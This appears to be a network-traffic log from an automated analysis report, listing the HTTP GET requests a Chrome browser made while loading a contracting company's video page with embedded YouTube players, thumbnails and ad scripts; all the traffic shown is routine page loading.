Source: global trafficHTTP traffic detected: GET /video HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/dynamic/19/8c31bd6a7e31516d9af11ddd76cf1f8b.png HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/videoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /embed/-PcNMUQloeU HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.citydiamondcontracting.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /embed/LiEQ_JV0h4w HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.citydiamondcontracting.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /embed/xFzWNmILl40 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.citydiamondcontracting.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /embed/Jo_coLYPcOQ HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.citydiamondcontracting.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /embed/erCmtRLIjD8 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.citydiamondcontracting.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /embed/kG5xyR1406I HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.citydiamondcontracting.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/dynamic/19/8c31bd6a7e31516d9af11ddd76cf1f8b.png HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /embed/vs01gUJV3iQ HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.citydiamondcontracting.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /embed/QJ96N5lUn0c HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.citydiamondcontracting.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /embed/hOPpxvP2E28 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.citydiamondcontracting.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/player/b0557ce3/www-player.css HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.youtube.com/embed/LiEQ_JV0h4wAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=m6oKKGjXu_0; VISITOR_INFO1_LIVE=SiT7r3wWjUA; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLA%3D%3D
Source: global trafficHTTP traffic detected: GET /s/player/26636eff/www-player.css HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.youtube.com/embed/Jo_coLYPcOQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=m6oKKGjXu_0; VISITOR_INFO1_LIVE=SiT7r3wWjUA; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLA%3D%3D
Source: global trafficHTTP traffic detected: GET /s/player/b0557ce3/player_ias.vflset/en_US/embed.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/embed/erCmtRLIjD8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=m6oKKGjXu_0; VISITOR_INFO1_LIVE=SiT7r3wWjUA; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLA%3D%3D
Source: global trafficHTTP traffic detected: GET /s/player/b0557ce3/www-embed-player.vflset/www-embed-player.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/embed/erCmtRLIjD8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=m6oKKGjXu_0; VISITOR_INFO1_LIVE=SiT7r3wWjUA; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLA%3D%3D
Source: global trafficHTTP traffic detected: GET /s/player/b0557ce3/player_ias.vflset/en_US/base.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/embed/erCmtRLIjD8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=m6oKKGjXu_0; VISITOR_INFO1_LIVE=SiT7r3wWjUA; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLA%3D%3D
Source: global trafficHTTP traffic detected: GET /s/player/26636eff/player_ias.vflset/en_US/embed.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/embed/Jo_coLYPcOQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=m6oKKGjXu_0; VISITOR_INFO1_LIVE=SiT7r3wWjUA; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLA%3D%3D
Source: global trafficHTTP traffic detected: GET /s/player/26636eff/www-embed-player.vflset/www-embed-player.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/embed/Jo_coLYPcOQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=m6oKKGjXu_0; VISITOR_INFO1_LIVE=SiT7r3wWjUA; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLA%3D%3D
Source: global trafficHTTP traffic detected: GET /s/player/26636eff/player_ias.vflset/en_US/base.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/embed/Jo_coLYPcOQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=m6oKKGjXu_0; VISITOR_INFO1_LIVE=SiT7r3wWjUA; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLA%3D%3D
Source: global trafficHTTP traffic detected: GET /vi/-PcNMUQloeU/sddefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/th/KZ9qBfv2Fvj8--thF3jkrqmjFIXwxVfodGy5wvrcirQ.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/player/b0557ce3/player_ias.vflset/en_US/remote.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/embed/-PcNMUQloeUAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=-EWOd4YpAz4; VISITOR_INFO1_LIVE=Ue1nfRIjFOk; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGQ%3D%3D
Source: global trafficHTTP traffic detected: GET /s/player/b0557ce3/player_ias.vflset/en_US/embed.js HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi_webp/erCmtRLIjD8/sddefault.webp HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /kX-vYQ9Gn6TcX7ke5nWkheWbQUMzZEQn1dyzA-bRdJ3yC6h_jbggZ0PleqthkW2AGlTADqSrSg=s68-c-k-c0x00ffffff-no-rj HTTP/1.1Host: yt3.ggpht.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi/xFzWNmILl40/sddefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi_webp/kG5xyR1406I/sddefault.webp HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
